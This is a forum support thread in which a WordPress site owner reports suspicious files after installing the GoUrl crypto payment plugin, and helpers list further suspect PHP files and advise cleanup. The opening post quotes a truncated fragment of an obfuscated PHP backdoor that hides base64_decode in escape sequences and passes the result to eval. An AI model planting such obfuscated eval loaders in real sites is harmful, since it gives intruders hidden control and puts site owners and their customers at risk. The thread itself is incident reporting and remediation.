Suspicious script running on WordPress after installing gourl.io

I recently installed this bitcoin / crypto payment gateway from WooCommerce that seems to have some good reviews. There is a file that I am not sure what it is and I seem to have some running scripts running. Here is a sample of the code.

My username on my VPS is robotinsight.

The Obstructed php file looks like this:

<?php /* Obfuscation provided by FOPO - Free Online PHP Obfuscator: http://www.fopo.com.ar/ This code was created on Friday, October 27th, 2017 at 8:53 UTC from IP 5.228.13.253 Checksum: f8ae2f3fcc05f04aece9ca0e0e21c64f25c4f0d6 */ $c1201518="\142\x61\163\145\66\64\137\144\x65\143\157\144\x65";@eval($c1201518( "Ly9OS3RIdStmU3gwbmx1L1ZXb2xVbDN5c0JQSHd4MnJKWW9rS3V4WFJVZk5SQXFuRFVpYitGU243Z1

Comments

  • Thank you for the info. Can you tell me what is the exact file?

  • 61d2ec.php

    In public_html

  • Thank you! please allow me a few minutes to check all of this.

  • edited April 2018

    Still checking, but so far, three other suspicious scripts have also been found:

    /public_html/wp-content/uploads/gourl/files/gourl_ipn.php
    /public_html/wp-content/uploads/gourl/images/qqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqq1-2.php
    /public_html/wp-content/uploads/gourl/images/qqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqq1.php
    

    I would ask you to check, and let me know if I may remove them. Also, I have noticed that the account is using an outdated version of WP, it should be updated to the latest one ASAP, as this too poses a security risk.

  • Thank you for your patience. No further potentially malicious scripts have been found. I would advise you to update everything, and also if you have any original code in the account, have your developer review it. Also, scanning all local devices for malware, and possibly changing all passwords would be wise.

  • Even after I removed this I found that the gourl folder in uploads folder remained.

  • People are also reporting they steal payments: https://wordpress.org/support/topic/stole-my-payment/

Sign In or Register to comment.